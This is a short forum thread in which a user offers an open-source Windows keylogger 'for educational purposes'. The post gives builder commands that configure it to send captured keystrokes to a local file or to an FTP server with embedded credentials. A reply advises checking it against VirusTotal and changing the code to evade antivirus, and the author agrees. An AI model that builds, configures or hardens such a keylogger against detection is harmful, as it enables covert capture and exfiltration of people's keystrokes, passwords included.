Open source windows keylogger

Hello! I wrote open source keylogger for educational purposes. It can send logs to local file/ftp server. It fully written in pure winapi.
For make new build you need to run builder:
Make new build build.exe what send logs when it equal or more than 1kb or every 5 minutes (300 seconds) to local file %LOCALAPPDATA%\keylog.txt
build.py 1024 300 file “%“LOCALAPPDATA”%”\keylog.txt build.exe
Make new build build.exe what send logs when it equal or more than 1kb or every 5 minutes (300 seconds) to FTP server 127.0.0.1 user Anon password Pass
build.py 1024 300 ftp ftp://Anon:[email protected]/ build.exe

Repo

5 Likes

hi there ,i appreciate you for building something , hope you learnt something new , here’s my suggestion
: 1) try running the keylogger against virustotal.com , see what happens
2) try changing code to evade AV’s

2 Likes

thanks buddy ! i will make my own form it now

This topic was automatically closed after 121 days. New replies are no longer allowed.